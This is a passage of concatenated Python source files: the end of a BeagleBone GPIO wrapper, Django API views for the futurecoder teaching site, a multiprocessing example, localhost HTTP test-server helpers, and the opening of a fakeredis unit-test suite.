# chip.name(),
# offset,
# 'unnamed' if name is None else name,
# 'unused' if consumer is None else consumer,
# 'input' if linedirection == gpiod.Line.DIRECTION_INPUT else 'output',
# 'active-low' if active_state == gpiod.Line.ACTIVE_LOW else 'active-high'))
found=1
break
if found:
break
chip.close()
if not found:
print(channel + ': Not found')
sys.exit(1)
# print(chip)
lines = chip.get_lines([offset])
# print(lines)
if direction == IN:
ret = lines.request(consumer=CONSUMER, type=gpiod.LINE_REQ_DIR_IN)
elif direction == OUT:
ret = lines.request(consumer=CONSUMER, type=gpiod.LINE_REQ_DIR_OUT)
else:
print("Unknown direction: " + str(direction))
sys.exit(1)
if ret:
print(ret)
ports[channel] = [lines, chip]
# print(ports)
def output(channel, vals):
"""Output to a GPIO channel
channel - gpio channel
value - 0/1 or False/True or LOW/HIGH"""
# print("output()")
print(channel)
channel = channelNameConvert(channel)
print(channel)
if type(vals) is not type([]):
vals = [vals]
ret = ports[channel][0].set_values(vals)
if ret:
print(ret)
def input(channel):
"""Input from a GPIO channel. Returns HIGH=1=True or LOW=0=False
gpio - gpio channel"""
# print("input()")
# print(channel)
channel = channelNameConvert(channel)
return ports[channel][0].get_values()
def wait_for_edge(channel, edge, child_conn, timeout = -1):
"""Wait for an edge.
channel - gpio channel
edge - RISING, FALLING or BOTH
timeout (optional) - time to wait in milliseconds. -1 will wait forever (default)"""
# print("wait_for_edge()")
# print(ports)
channel = channelNameConvert(channel)
line=ports[channel][0]
chip=ports[channel][1]
if edge == RISING:
ev_edge = gpiod.LINE_REQ_EV_RISING_EDGE
elif edge == FALLING:
ev_edge = gpiod.LINE_REQ_EV_FALLING_EDGE
elif edge == BOTH:
ev_edge = gpiod.LINE_REQ_EV_BOTH_EDGES
else:
print("Unknown edge type: " + str(edge))
# Try releasing the line and requesting again
offset = line.to_list()[0].offset()
line.release()
line = chip.get_lines([offset])
line.request(consumer=CONSUMER, type=ev_edge)
x = None
while not x:
thread_go = not child_conn.poll()
if not thread_go:
return False
x = line.event_wait(sec = 1)
return True
def add_event_detect(channel, edge, callback=None, debounce=0):
"""Enable edge detection events for a particular GPIO channel.
channel - board pin number.
edge - RISING, FALLING or BOTH
[callback] - A callback function for the event (optional)
[bouncetime] - Switch bounce timeout in ms for callback"""
global threads
global parent_conn
channel = channelNameConvert(channel)
parent_conn_temp, child_conn = Pipe()
parent_conn.append(parent_conn_temp)
process2 = Process(target = run, args = (channel, edge, callback, debounce, child_conn))
threads.append(process2)
process2.start()
return
def cleanup():
"""Clean up by resetting all GPIO channels that have been used by
this program to INPUT with no pullup/pulldown and no event detection."""
global ports
global threads
i = 0
for thread in threads:
parent_conn[i].send(False)
parent_conn[i].close()
thread.join()
thread.close()
i = i + 1
for channel, val in ports.items():
ret = val[0].release()
if ret:
print(ret)
ret = val[1].close()
if ret:
print(ret)
ports={}
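# Example usage (a minimal sketch, not part of the original module). It assumes
# this runs on a BeagleBone with libgpiod available and that header pin P9_12
# is safe to drive (e.g. wired to an LED through a resistor).
if __name__ == '__main__':
    setup("P9_12", OUT)           # claim the line for output
    for _ in range(5):
        output("P9_12", HIGH)     # drive the pin high
        time.sleep(0.5)
        output("P9_12", LOW)      # drive the pin low
        time.sleep(0.5)
    cleanup()                     # release every line opened by this module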
|
views.py
|
import json
import logging
import traceback
from datetime import datetime
from pathlib import Path
from threading import Thread
from time import sleep
from typing import get_type_hints
from uuid import uuid4
import birdseye.server
import requests
from birdseye import eye
from django.conf import settings
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.forms import ModelForm
from django.http import HttpResponse, JsonResponse
from django.views import View
from django.views.generic import CreateView
from django_user_agents.utils import get_user_agent
from littleutils import select_attrs, only
from sentry_sdk import capture_exception
from main.models import CodeEntry, ListEmail, User
from main.text import page_slugs_list, pages
from main.utils import highlighted_markdown
from main.utils.django import PlaceHolderForm
from main.workers.master import worker_result
log = logging.getLogger(__name__)
def api_view(request, method_name):
try:
method = getattr(API(request), method_name)
body = request.body
body = body.decode('utf8')
args = json.loads(body)
for arg_name, hint in get_type_hints(method).items():
if arg_name == 'return':
continue
arg = args[arg_name]
if not isinstance(arg, hint):
log.warning(
'Incorrect type for argument %s = %r of method %s: found %s, expected %s',
arg_name, arg, method_name, arg.__class__.__name__, hint.__name__)
result = method(**args)
if not isinstance(result, dict):
result = {'result': result}
except Exception:
capture_exception()
result = dict(
error=dict(
traceback=traceback.format_exc(),
)
)
return JsonResponse(result)
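# A sketch of the contract this dispatcher implements (added here for clarity,
# not part of the original file): the frontend POSTs a JSON body whose keys
# match the parameters of the named API method, e.g. for run_code:
#
#   POST /api/run_code/          (exact URL pattern assumed)
#   {"code": "print(1)", "source": "editor", "page_index": 0, "step_index": 0}
#
# On success the response is the method's dict result (wrapped in
# {"result": ...} if the method returned a non-dict); on failure it is
# {"error": {"traceback": "..."}}.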
class API:
def __init__(self, request):
self.request = request
@property
def user(self) -> User:
return self.request.user
def run_code(self, code, source, page_index, step_index):
page_slug = page_slugs_list[page_index]
page = pages[page_slug]
step_name = pages[page_slug].step_names[step_index]
step = getattr(page, step_name)
entry_dict = dict(
input=code,
source=source,
page_slug=page_slug,
step_name=step_name,
user_id=self.user.id,
)
entry = None
if settings.SAVE_CODE_ENTRIES:
entry = CodeEntry.objects.create(**entry_dict)
result = worker_result(entry_dict)
if settings.SAVE_CODE_ENTRIES:
entry.output = result["output"]
entry.save()
if result["error"]:
return dict(error=result["error"])
if passed := result["passed"]:
self.move_step(page_index, step_index + 1)
output_parts = result["output_parts"]
if not result["awaiting_input"]:
output_parts.append(dict(text=">>> ", color="white"))
birdseye_url = None
birdseye_objects = result["birdseye_objects"]
if birdseye_objects:
functions = birdseye_objects["functions"]
top_old_function_id = only(
f["id"]
for f in functions
if f["name"] == "<module>"
)
function_ids = [d.pop('id') for d in functions]
functions = [eye.db.Function(**{**d, 'hash': uuid4().hex}) for d in functions]
with eye.db.session_scope() as session:
for func in functions:
session.add(func)
session.commit()
function_ids = {old: func.id for old, func in zip(function_ids, functions)}
call_id = None
for call in birdseye_objects["calls"]:
old_function_id = call["function_id"]
is_top_call = old_function_id == top_old_function_id
call["function_id"] = function_ids[old_function_id]
call["start_time"] = datetime.fromisoformat(call["start_time"])
call = eye.db.Call(**call)
session.add(call)
if is_top_call:
call_id = call.id
birdseye_url = f"/birdseye/call/{call_id}"
return dict(
result=output_parts,
messages=list(map(highlighted_markdown, result["messages"])),
state=self.current_state(),
birdseye_url=birdseye_url,
passed=passed,
prediction=dict(
choices=getattr(step, "predicted_output_choices", None),
answer=getattr(step, "correct_output", None),
) if passed else dict(choices=None, answer=None),
)
def load_data(self):
user = self.user
if user.is_anonymous:
return {}
Thread(target=self.warmup_user_process).start()
return dict(
pages=[
dict(**select_attrs(page, "slug title index"), steps=page.step_dicts)
for page in pages.values()
],
state=self.current_state(),
user=dict(
email=user.email,
developerMode=user.developer_mode,
),
page_index=pages[self.user.page_slug].index,
)
def warmup_user_process(self):
page_slug = page_slugs_list[0]
step_name = pages[page_slug].step_names[0]
entry_dict = dict(
input="# dummy startup code",
source="shell",
page_slug=page_slug,
step_name=step_name,
user_id=self.user.id,
)
worker_result(entry_dict)
def set_developer_mode(self, value: bool):
self.user.developer_mode = value
self.user.save()
def current_state(self):
pages_progress = self.user.pages_progress
return dict(
pages_progress=[
page.step_names.index(pages_progress[page_slug]["step_name"])
for page_slug, page in pages.items()
],
)
def move_step(self, page_index, step_index: int):
page_slug = page_slugs_list[page_index]
step_names = pages[page_slug].step_names
if 0 <= step_index < len(step_names):
new_step_name = step_names[step_index]
self.user.pages_progress[page_slug]["step_name"] = new_step_name
self.user.save()
return self.current_state()
def set_page(self, index):
self.user.page_slug = page_slugs_list[index]
self.user.save()
def get_solution(self, page_index, step_index: int):
# TODO deprecated
page = pages[page_slugs_list[page_index]]
step = getattr(page, page.step_names[step_index])
return step.get_solution
def submit_feedback(self, title, description, state):
"""Create an issue on github.com using the given parameters."""
body = f"""
**User Issue**
Email: {self.user.email}
User Agent: {get_user_agent(self.request)}
{description}
<details>
<summary>Redux state</summary>
<p>
```json
{json.dumps(state, indent=2)}
```
</p>
</details>
"""
r = requests.post(
'https://api.github.com/repos/alexmojaki/futurecoder/issues',
json={'title': title,
'body': body,
'labels': ['user', 'bug']},
headers=dict(
Authorization='token ' + settings.GITHUB_TOKEN,
),
)
assert r.status_code == 201
class FrontendAppView(LoginRequiredMixin, View):
"""
Serves the compiled frontend entry point (only works if you have run `yarn
run build`).
"""
def get(self, _request):
try:
with open(Path(__file__).parent / "../../frontend/build/index.html") as f:
return HttpResponse(f.read())
except FileNotFoundError:
return HttpResponse(
"""
This URL is only used when you have built the production
version of the app. Visit http://localhost:3000/ instead, or
run `yarn run build` to test the production version.
""",
status=501,
)
class HomePageView(SuccessMessageMixin, CreateView):
template_name = "home.html"
success_message = "Success! We will email %(email)s when the time is right..."
def get_success_url(self):
return self.request.path_info
class form_class(ModelForm, PlaceHolderForm):
helper_attrs = dict(form_tag=False)
class Meta:
model = ListEmail
fields = ["email"]
def timeout_view(request):
sleep(35)
def fix_birdseye_server():
views = birdseye.server.app.view_functions
birdseye.server.app.view_functions = {
"call_view": views["ipython_call_view"],
"static": views["static"],
}
fix_birdseye_server()
|
multiprocessing_hello_world.py
|
import multiprocessing
import time
def hello_world(delay):
print(f'Hello ...{delay}')
time.sleep(delay)
return f'...{delay} sec delayed world!'
t1 = time.time()
p1 = multiprocessing.Process(target=hello_world, args=[1.0])
p2 = multiprocessing.Process(target=hello_world, args=[1.0])
p1.start()
p2.start()
t2 = time.time()
# Note that this print comes _long_ before the processes finish
print("This prints after %s" % (t2-t1))
p1.join()
p2.join()
t2 = time.time()
# This print only happens once both processes have been joined
print("Actually done after %s" % (t2-t1))
t1 = time.time()
# Second run: time the complete start-to-join cycle
p1 = multiprocessing.Process(target=hello_world, args=[1.0])
p2 = multiprocessing.Process(target=hello_world, args=[1.0])
p1.start()
p2.start()
p1.join()
p2.join()
t2 = time.time()
# Both processes ran concurrently, so the total time is roughly one delay
print("Correctly done after %s" % (t2-t1))
|
httpd.py
|
import hashlib
import os
import threading
from http import HTTPStatus
from http.server import HTTPServer, SimpleHTTPRequestHandler
from RangeHTTPServer import RangeRequestHandler
class TestRequestHandler(RangeRequestHandler):
checksum_header = None
def end_headers(self):
# RangeRequestHandler only sends Accept-Ranges header if Range header
# is present, see https://github.com/danvk/RangeHTTPServer/issues/23
if not self.headers.get("Range"):
self.send_header("Accept-Ranges", "bytes")
# Add a checksum header
if self.checksum_header:
file = self.translate_path(self.path)
if not os.path.isdir(file) and os.path.exists(file):
with open(file, "rb") as fd:
contents = fd.read()
checksum = hashlib.md5(contents).hexdigest()
self.send_header(self.checksum_header, checksum)
RangeRequestHandler.end_headers(self)
class ETagHandler(TestRequestHandler):
checksum_header = "ETag"
class ContentMD5Handler(TestRequestHandler):
checksum_header = "Content-MD5"
class PushRequestHandler(SimpleHTTPRequestHandler):
def _chunks(self):
while True:
data = self.rfile.readline(65537)
chunk_size = int(data[:-2], 16)
if chunk_size == 0:
return
data = self.rfile.read(chunk_size)
yield data
self.rfile.read(2)
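    # The generator above consumes the standard HTTP/1.1 chunked wire format:
    # a hexadecimal size line, the chunk data, and a trailing CRLF, terminated
    # by a zero-size chunk. For example:
    #
    #   4\r\n
    #   Wiki\r\n
    #   0\r\n
    #   \r\n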
def do_POST(self):
chunked = self.headers.get("Transfer-Encoding", "") == "chunked"
path = self.translate_path(self.path)
try:
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, "wb") as fd:
if chunked:
for chunk in self._chunks():
fd.write(chunk)
else:
size = int(self.headers.get("Content-Length", 0))
fd.write(self.rfile.read(size))
except OSError as e:
self.send_error(HTTPStatus.INTERNAL_SERVER_ERROR, str(e))
return
self.send_response(HTTPStatus.OK)
self.end_headers()
class StaticFileServer:
_lock = threading.Lock()
def __init__(self, handler_class=ETagHandler):
self._lock.acquire()
self._httpd = HTTPServer(("localhost", 0), handler_class)
self._thread = None
def __enter__(self):
self._thread = threading.Thread(target=self._httpd.serve_forever)
self._thread.daemon = True
self._thread.start()
return self._httpd
def __exit__(self, *args):
self._httpd.socket.close()
self._httpd.shutdown()
self._httpd.server_close()
self._lock.release()
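# Example usage (a minimal sketch, not part of the original helpers): the
# server binds to an ephemeral port on localhost, so a test reads the chosen
# port back from the HTTPServer instance returned by the context manager.
#
#   with StaticFileServer(handler_class=ContentMD5Handler) as httpd:
#       port = httpd.server_address[1]
#       # e.g. fetch http://localhost:<port>/<a file under the current directory>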
|
test_fakeredis.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from time import sleep, time
from redis.exceptions import ResponseError
import inspect
from functools import wraps
import os
import sys
import threading
from nose.plugins.skip import SkipTest
from nose.plugins.attrib import attr
import redis
import redis.client
import fakeredis
from datetime import datetime, timedelta
try:
# Python 2.6, 2.7
from Queue import Queue
except ImportError:
# Python 3
from queue import Queue
PY2 = sys.version_info[0] == 2
if not PY2:
long = int
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
else:
import unittest
# Try importlib, then imp, then the old builtin `reload`
try:
from importlib import reload
except ImportError:
try:
from imp import reload
except ImportError:
pass
DEFAULT_ENCODING = fakeredis.DEFAULT_ENCODING
def redis_must_be_running(cls):
# This can probably be improved. This determines
# at import time if the tests should be run, but we probably
# want it to be when the tests are actually run.
try:
r = redis.StrictRedis('localhost', port=6379)
r.ping()
except redis.ConnectionError:
redis_running = False
else:
redis_running = True
if not redis_running:
for name, attribute in inspect.getmembers(cls):
if name.startswith('test_'):
@wraps(attribute)
def skip_test(*args, **kwargs):
raise SkipTest("Redis is not running.")
setattr(cls, name, skip_test)
cls.setUp = lambda x: None
cls.tearDown = lambda x: None
return cls
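# A sketch of how the decorator above is meant to be used (assumed from its
# implementation, not shown in this excerpt): applied to a TestCase subclass so
# that every test_* method is skipped when no real Redis server is listening on
# localhost:6379.
#
#   @redis_must_be_running
#   class TestRealStrictRedis(TestFakeStrictRedis):
#       def create_redis(self, db=0):
#           return redis.StrictRedis('localhost', port=6379, db=db)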
def key_val_dict(size=100):
return dict([(b'key:' + bytes([i]), b'val:' + bytes([i]))
for i in range(size)])
class TestFakeStrictRedis(unittest.TestCase):
decode_responses = False
def setUp(self):
self.redis = self.create_redis()
def tearDown(self):
self.redis.flushall()
del self.redis
if sys.version_info >= (3,):
def assertItemsEqual(self, a, b):
return self.assertCountEqual(a, b)
def create_redis(self, db=0):
return fakeredis.FakeStrictRedis(db=db)
def _round_str(self, x):
self.assertIsInstance(x, bytes)
return round(float(x))
def test_flushdb(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.keys(), [b'foo'])
self.assertEqual(self.redis.flushdb(), True)
self.assertEqual(self.redis.keys(), [])
def test_set_then_get(self):
self.assertEqual(self.redis.set('foo', 'bar'), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_None_value(self):
self.assertEqual(self.redis.set('foo', None), True)
self.assertEqual(self.redis.get('foo'), b'None')
def test_set_float_value(self):
x = 1.23456789123456789
self.redis.set('foo', x)
self.assertEqual(float(self.redis.get('foo')), x)
def test_saving_non_ascii_chars_as_value(self):
self.assertEqual(self.redis.set('foo', 'Ñandu'), True)
self.assertEqual(self.redis.get('foo'),
u'Ñandu'.encode(DEFAULT_ENCODING))
def test_saving_unicode_type_as_value(self):
self.assertEqual(self.redis.set('foo', u'Ñandu'), True)
self.assertEqual(self.redis.get('foo'),
u'Ñandu'.encode(DEFAULT_ENCODING))
def test_saving_non_ascii_chars_as_key(self):
self.assertEqual(self.redis.set('Ñandu', 'foo'), True)
self.assertEqual(self.redis.get('Ñandu'), b'foo')
def test_saving_unicode_type_as_key(self):
self.assertEqual(self.redis.set(u'Ñandu', 'foo'), True)
self.assertEqual(self.redis.get(u'Ñandu'), b'foo')
def test_future_newbytes(self):
try:
from builtins import bytes
except ImportError:
raise SkipTest('future.types not available')
self.redis.set(bytes(b'\xc3\x91andu'), 'foo')
self.assertEqual(self.redis.get(u'Ñandu'), b'foo')
def test_future_newstr(self):
try:
from builtins import str
except ImportError:
raise SkipTest('future.types not available')
self.redis.set(str(u'Ñandu'), 'foo')
self.assertEqual(self.redis.get(u'Ñandu'), b'foo')
def test_get_does_not_exist(self):
self.assertEqual(self.redis.get('foo'), None)
def test_get_with_non_str_keys(self):
self.assertEqual(self.redis.set('2', 'bar'), True)
self.assertEqual(self.redis.get(2), b'bar')
def test_get_invalid_type(self):
self.assertEqual(self.redis.hset('foo', 'key', 'value'), 1)
with self.assertRaises(redis.ResponseError):
self.redis.get('foo')
def test_set_non_str_keys(self):
self.assertEqual(self.redis.set(2, 'bar'), True)
self.assertEqual(self.redis.get(2), b'bar')
self.assertEqual(self.redis.get('2'), b'bar')
def test_getbit(self):
self.redis.setbit('foo', 3, 1)
self.assertEqual(self.redis.getbit('foo', 0), 0)
self.assertEqual(self.redis.getbit('foo', 1), 0)
self.assertEqual(self.redis.getbit('foo', 2), 0)
self.assertEqual(self.redis.getbit('foo', 3), 1)
self.assertEqual(self.redis.getbit('foo', 4), 0)
self.assertEqual(self.redis.getbit('foo', 100), 0)
def test_getbit_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.getbit('foo', 1)
def test_multiple_bits_set(self):
self.redis.setbit('foo', 1, 1)
self.redis.setbit('foo', 3, 1)
self.redis.setbit('foo', 5, 1)
self.assertEqual(self.redis.getbit('foo', 0), 0)
self.assertEqual(self.redis.getbit('foo', 1), 1)
self.assertEqual(self.redis.getbit('foo', 2), 0)
self.assertEqual(self.redis.getbit('foo', 3), 1)
self.assertEqual(self.redis.getbit('foo', 4), 0)
self.assertEqual(self.redis.getbit('foo', 5), 1)
self.assertEqual(self.redis.getbit('foo', 6), 0)
def test_unset_bits(self):
self.redis.setbit('foo', 1, 1)
self.redis.setbit('foo', 2, 0)
self.redis.setbit('foo', 3, 1)
self.assertEqual(self.redis.getbit('foo', 1), 1)
self.redis.setbit('foo', 1, 0)
self.assertEqual(self.redis.getbit('foo', 1), 0)
self.redis.setbit('foo', 3, 0)
self.assertEqual(self.redis.getbit('foo', 3), 0)
def test_get_set_bits(self):
# set bit 5
self.assertFalse(self.redis.setbit('a', 5, True))
self.assertTrue(self.redis.getbit('a', 5))
# unset bit 4
self.assertFalse(self.redis.setbit('a', 4, False))
self.assertFalse(self.redis.getbit('a', 4))
# set bit 4
self.assertFalse(self.redis.setbit('a', 4, True))
self.assertTrue(self.redis.getbit('a', 4))
# set bit 5 again
self.assertTrue(self.redis.setbit('a', 5, True))
self.assertTrue(self.redis.getbit('a', 5))
def test_setbits_and_getkeys(self):
# The bit operations and the get commands
# should play nicely with each other.
self.redis.setbit('foo', 1, 1)
self.assertEqual(self.redis.get('foo'), b'@')
self.redis.setbit('foo', 2, 1)
self.assertEqual(self.redis.get('foo'), b'`')
self.redis.setbit('foo', 3, 1)
self.assertEqual(self.redis.get('foo'), b'p')
self.redis.setbit('foo', 9, 1)
self.assertEqual(self.redis.get('foo'), b'p@')
self.redis.setbit('foo', 54, 1)
self.assertEqual(self.redis.get('foo'), b'p@\x00\x00\x00\x00\x02')
def test_setbit_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.setbit('foo', 0, 1)
def test_setbit_expiry(self):
self.redis.set('foo', b'0x00', ex=10)
self.redis.setbit('foo', 1, 1)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_bitcount(self):
self.redis.delete('foo')
self.assertEqual(self.redis.bitcount('foo'), 0)
self.redis.setbit('foo', 1, 1)
self.assertEqual(self.redis.bitcount('foo'), 1)
self.redis.setbit('foo', 8, 1)
self.assertEqual(self.redis.bitcount('foo'), 2)
self.assertEqual(self.redis.bitcount('foo', 1, 1), 1)
self.redis.setbit('foo', 57, 1)
self.assertEqual(self.redis.bitcount('foo'), 3)
self.redis.set('foo', ' ')
self.assertEqual(self.redis.bitcount('foo'), 1)
def test_bitcount_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.bitcount('foo')
def test_getset_not_exist(self):
val = self.redis.getset('foo', 'bar')
self.assertEqual(val, None)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_getset_exists(self):
self.redis.set('foo', 'bar')
val = self.redis.getset('foo', b'baz')
self.assertEqual(val, b'bar')
val = self.redis.getset('foo', b'baz2')
self.assertEqual(val, b'baz')
def test_getset_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.getset('foo', 'bar')
def test_setitem_getitem(self):
self.assertEqual(self.redis.keys(), [])
self.redis['foo'] = 'bar'
self.assertEqual(self.redis['foo'], b'bar')
def test_getitem_non_existent_key(self):
self.assertEqual(self.redis.keys(), [])
with self.assertRaises(KeyError):
self.redis['noexists']
def test_strlen(self):
self.redis['foo'] = 'bar'
self.assertEqual(self.redis.strlen('foo'), 3)
self.assertEqual(self.redis.strlen('noexists'), 0)
def test_strlen_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.strlen('foo')
def test_substr(self):
self.redis['foo'] = 'one_two_three'
self.assertEqual(self.redis.substr('foo', 0), b'one_two_three')
self.assertEqual(self.redis.substr('foo', 0, 2), b'one')
self.assertEqual(self.redis.substr('foo', 4, 6), b'two')
self.assertEqual(self.redis.substr('foo', -5), b'three')
def test_substr_noexist_key(self):
self.assertEqual(self.redis.substr('foo', 0), b'')
self.assertEqual(self.redis.substr('foo', 10), b'')
self.assertEqual(self.redis.substr('foo', -5, -1), b'')
def test_substr_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.substr('foo', 0)
def test_append(self):
self.assertTrue(self.redis.set('foo', 'bar'))
self.assertEqual(self.redis.append('foo', 'baz'), 6)
self.assertEqual(self.redis.get('foo'), b'barbaz')
def test_append_with_no_preexisting_key(self):
self.assertEqual(self.redis.append('foo', 'bar'), 3)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_append_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.append('foo', b'x')
def test_incr_with_no_preexisting_key(self):
self.assertEqual(self.redis.incr('foo'), 1)
self.assertEqual(self.redis.incr('bar', 2), 2)
def test_incr_by(self):
self.assertEqual(self.redis.incrby('foo'), 1)
self.assertEqual(self.redis.incrby('bar', 2), 2)
def test_incr_preexisting_key(self):
self.redis.set('foo', 15)
self.assertEqual(self.redis.incr('foo', 5), 20)
self.assertEqual(self.redis.get('foo'), b'20')
def test_incr_expiry(self):
self.redis.set('foo', 15, ex=10)
self.redis.incr('foo', 5)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_incr_bad_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.incr('foo', 15)
self.redis.rpush('foo2', 1)
with self.assertRaises(redis.ResponseError):
self.redis.incr('foo2', 15)
def test_incr_with_float(self):
with self.assertRaises(redis.ResponseError):
self.redis.incr('foo', 2.0)
def test_incr_followed_by_mget(self):
self.redis.set('foo', 15)
self.assertEqual(self.redis.incr('foo', 5), 20)
self.assertEqual(self.redis.get('foo'), b'20')
def test_incr_followed_by_mget_returns_strings(self):
self.redis.incr('foo', 1)
self.assertEqual(self.redis.mget(['foo']), [b'1'])
def test_incrbyfloat(self):
self.redis.set('foo', 0)
self.assertEqual(self.redis.incrbyfloat('foo', 1.0), 1.0)
self.assertEqual(self.redis.incrbyfloat('foo', 1.0), 2.0)
def test_incrbyfloat_with_noexist(self):
self.assertEqual(self.redis.incrbyfloat('foo', 1.0), 1.0)
self.assertEqual(self.redis.incrbyfloat('foo', 1.0), 2.0)
def test_incrbyfloat_expiry(self):
self.redis.set('foo', 1.5, ex=10)
self.redis.incrbyfloat('foo', 2.5)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_incrbyfloat_bad_type(self):
self.redis.set('foo', 'bar')
with self.assertRaisesRegexp(redis.ResponseError, 'not a valid float'):
self.redis.incrbyfloat('foo', 1.0)
self.redis.rpush('foo2', 1)
with self.assertRaises(redis.ResponseError):
self.redis.incrbyfloat('foo2', 1.0)
def test_incrbyfloat_precision(self):
x = 1.23456789123456789
self.assertEqual(self.redis.incrbyfloat('foo', x), x)
self.assertEqual(float(self.redis.get('foo')), x)
def test_decr(self):
self.redis.set('foo', 10)
self.assertEqual(self.redis.decr('foo'), 9)
self.assertEqual(self.redis.get('foo'), b'9')
def test_decr_newkey(self):
self.redis.decr('foo')
self.assertEqual(self.redis.get('foo'), b'-1')
def test_decr_expiry(self):
self.redis.set('foo', 10, ex=10)
self.redis.decr('foo', 5)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_decr_badtype(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.decr('foo', 15)
self.redis.rpush('foo2', 1)
with self.assertRaises(redis.ResponseError):
self.redis.decr('foo2', 15)
def test_keys(self):
self.redis.set('', 'empty')
self.redis.set('abc\n', '')
self.redis.set('abc\\', '')
self.redis.set('abcde', '')
if self.decode_responses:
self.assertEqual(sorted(self.redis.keys()),
[b'', b'abc\n', b'abc\\', b'abcde'])
else:
self.redis.set(b'\xfe\xcd', '')
self.assertEqual(sorted(self.redis.keys()),
[b'', b'abc\n', b'abc\\', b'abcde', b'\xfe\xcd'])
self.assertEqual(self.redis.keys('??'), [b'\xfe\xcd'])
# empty pattern not the same as no pattern
self.assertEqual(self.redis.keys(''), [b''])
# ? must match \n
self.assertEqual(sorted(self.redis.keys('abc?')),
[b'abc\n', b'abc\\'])
# must be anchored at both ends
self.assertEqual(self.redis.keys('abc'), [])
self.assertEqual(self.redis.keys('bcd'), [])
# wildcard test
self.assertEqual(self.redis.keys('a*de'), [b'abcde'])
# positive groups
self.assertEqual(sorted(self.redis.keys('abc[d\n]*')),
[b'abc\n', b'abcde'])
self.assertEqual(self.redis.keys('abc[c-e]?'), [b'abcde'])
self.assertEqual(self.redis.keys('abc[e-c]?'), [b'abcde'])
self.assertEqual(self.redis.keys('abc[e-e]?'), [])
self.assertEqual(self.redis.keys('abcd[ef'), [b'abcde'])
# negative groups
self.assertEqual(self.redis.keys('abc[^d\\\\]*'), [b'abc\n'])
# some escaping cases that redis handles strangely
self.assertEqual(self.redis.keys('abc\\'), [b'abc\\'])
self.assertEqual(self.redis.keys(r'abc[\c-e]e'), [])
self.assertEqual(self.redis.keys(r'abc[c-\e]e'), [])
def test_exists(self):
self.assertFalse('foo' in self.redis)
self.redis.set('foo', 'bar')
self.assertTrue('foo' in self.redis)
def test_contains(self):
self.assertFalse(self.redis.exists('foo'))
self.redis.set('foo', 'bar')
self.assertTrue(self.redis.exists('foo'))
def test_rename(self):
self.redis.set('foo', 'unique value')
self.assertTrue(self.redis.rename('foo', 'bar'))
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.get('bar'), b'unique value')
def test_rename_nonexistent_key(self):
with self.assertRaises(redis.ResponseError):
self.redis.rename('foo', 'bar')
def test_renamenx_doesnt_exist(self):
self.redis.set('foo', 'unique value')
self.assertTrue(self.redis.renamenx('foo', 'bar'))
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.get('bar'), b'unique value')
def test_rename_does_exist(self):
self.redis.set('foo', 'unique value')
self.redis.set('bar', 'unique value2')
self.assertFalse(self.redis.renamenx('foo', 'bar'))
self.assertEqual(self.redis.get('foo'), b'unique value')
self.assertEqual(self.redis.get('bar'), b'unique value2')
def test_rename_expiry(self):
self.redis.set('foo', 'value1', ex=10)
self.redis.set('bar', 'value2')
self.redis.rename('foo', 'bar')
self.assertGreater(self.redis.ttl('bar'), 0)
def test_mget(self):
self.redis.set('foo', 'one')
self.redis.set('bar', 'two')
self.assertEqual(self.redis.mget(['foo', 'bar']), [b'one', b'two'])
self.assertEqual(self.redis.mget(['foo', 'bar', 'baz']),
[b'one', b'two', None])
self.assertEqual(self.redis.mget('foo', 'bar'), [b'one', b'two'])
self.assertEqual(self.redis.mget('foo', 'bar', None),
[b'one', b'two', None])
def test_mget_with_no_keys_raises_error(self):
with self.assertRaisesRegexp(
redis.ResponseError, 'wrong number of arguments'):
self.redis.mget([])
def test_mget_mixed_types(self):
self.redis.hset('hash', 'bar', 'baz')
self.redis.zadd('zset', 1, 'bar')
self.redis.sadd('set', 'member')
self.redis.rpush('list', 'item1')
self.redis.set('string', 'value')
self.assertEqual(
self.redis.mget(['hash', 'zset', 'set', 'string', 'absent']),
[None, None, None, b'value', None])
def test_mset_with_no_keys_raises_error(self):
with self.assertRaisesRegexp(
redis.RedisError, 'MSET requires'):
self.redis.mset([])
def test_mset(self):
self.assertEqual(self.redis.mset({'foo': 'one', 'bar': 'two'}), True)
self.assertEqual(self.redis.mset({'foo': 'one', 'bar': 'two'}), True)
self.assertEqual(self.redis.mget('foo', 'bar'), [b'one', b'two'])
def test_mset_accepts_kwargs(self):
self.assertEqual(
self.redis.mset(foo='one', bar='two'), True)
self.assertEqual(
self.redis.mset(foo='one', baz='three'), True)
self.assertEqual(self.redis.mget('foo', 'bar', 'baz'),
[b'one', b'two', b'three'])
def test_msetnx(self):
self.assertEqual(self.redis.msetnx({'foo': 'one', 'bar': 'two'}),
True)
self.assertEqual(self.redis.msetnx({'bar': 'two', 'baz': 'three'}),
False)
self.assertEqual(self.redis.mget('foo', 'bar', 'baz'),
[b'one', b'two', None])
def test_setex(self):
self.assertEqual(self.redis.setex('foo', 100, 'bar'), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_setex_using_timedelta(self):
self.assertEqual(
self.redis.setex('foo', timedelta(seconds=100), 'bar'), True)
